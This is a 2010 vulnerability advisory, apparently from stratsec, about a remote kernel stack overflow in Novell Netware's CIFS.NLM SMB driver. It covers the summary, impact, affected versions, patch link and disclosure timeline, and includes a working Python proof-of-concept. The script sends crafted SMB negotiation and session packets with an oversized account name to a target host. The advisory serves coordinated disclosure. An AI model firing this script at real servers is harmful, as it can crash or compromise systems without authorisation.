Jun 17, 2010
- Title: Netware SMB Remote Stack Overflow
- Version: 1.0
- Issue type: Stack Overflow
- Affected vendor: Novell
- Release date: 17/06/2010
- Discovered by: Laurent Gaffié
- Issue status: Patch available
Summary
A vulnerability exists in the Netware CIFS.NLM driver which allows an attacker to trigger a kernel stack overflow by sending a specific ‘Sessions Setup AndX’ query. Successful exploitation of this issue will result in remote code execution with kernel privileges. Failed attempts may result in a remote denial of service.
Description
The Server Message Block (SMB) protocol, also known as Common Internet File System (CIFS) acts as an application-layer protocol to provide shared access to files, printers and Inter-Process Communication (IPC). It is also a transport for Distributed Computing Environment / Remote Procedure Call (DCE / RPC) operations.After negotiating a SMB communication the client sends a ‘Session Setup AndX’ packet to negotiate a session, to be able to connect on a specific share. By sending a specially crafted request packet containing a long ‘AccountName’ value, it is possible trigger a kernel stack overflow.
Impact
A remote attacker may be able to remotely execute code with kernel privileges on affected Netware systems. Failed attempts will result in a denial of service.
Affected products
Netware version 6.5 SP8 and prior.
Proof of concept
import sys,socket
from socket import *
if len(sys.argv)<=1:
sys.exit('usage: python netware.py IP_ADDR’)
host = sys.argv[1],139
payload = "A" * 200
packetnego=(
"\x00\x00\x00\x9a"
"\xff\x53\x4d\x42\x72\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00"
"\x01\x3d\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52"
"\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02"
"\x4d\x49\x43\x52\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x29\x4f"
"\x52\x4b\x53\x20\x33\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d"
"\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x44\x4f\x53\x20\x4c\x41"
"\x4e\x4d\x20\x4e\x32\x2e\x31\x00\x02\x57\x69\x6e\x64\x6f\x77"
"\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70"
"\x73\x20\x33\x2e\x31\x61\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30"
"\x2e\x31\x32\x00"
)
packetsession=(
"\x00\x00\x01\x3e"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf9\x19\x01\x00\x81\x61"
"\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"
"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x28\xd4\xce"
"\xd7\x93\xc8\x8b\x16\x5f\x42\x2a\x7a\xfd\x15\x7a\xfd\x15\x7a\xfd"+payload+
"\xef\xa5\x42\x5e\x5c\x2d\x4b\x1a\x1c\x59\x4f\x00\x57\x4f\x52\x4b"
"\x47\x52\x4f\x55\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e"
"\x30\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff"
"\x00\x00\x00\x02\x00\x01\x00\x1f\x00\x00\x5c\x5c\x57\x49\x4e\x2d"
"\x45\x37\x4a\x30\x4f\x4e\x49\x4d\x53\x45\x33\x5c\x55\x53\x45\x52"
"\x53\x00\x3f\x3f\x3f\x3f\x3f\x00"
)
## chained Session Setup Andx, tree connect command, field = username, basic stack overflow
s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(packetsession))
print "done !"
Solution
Apply NSS update located at: http://download.novell.com/Download?buildid=tMWCI1cdI7s~
This patch has not been verified by stratsec.
Response timeline
- 07/02/2010 – Issue discovered.
- 10/02/2010 – Vendor notified.
- 10/02/2010 – Vendor acknowledged receipt of advisory.
- 11/02/2010 - Vendor confirmed issue presence.
- 16/06/2010 – Patch released by vendor.
- 17/06/2010 - stratsec advisory published.
References
- Vendor advisory: http://download.novell.com/Download?buildid=tMWCI1cdI7s~
Download advisory: SS-2010-006 stratsec Netware Remote Stack Overflow Security Advisory v1.0.pdf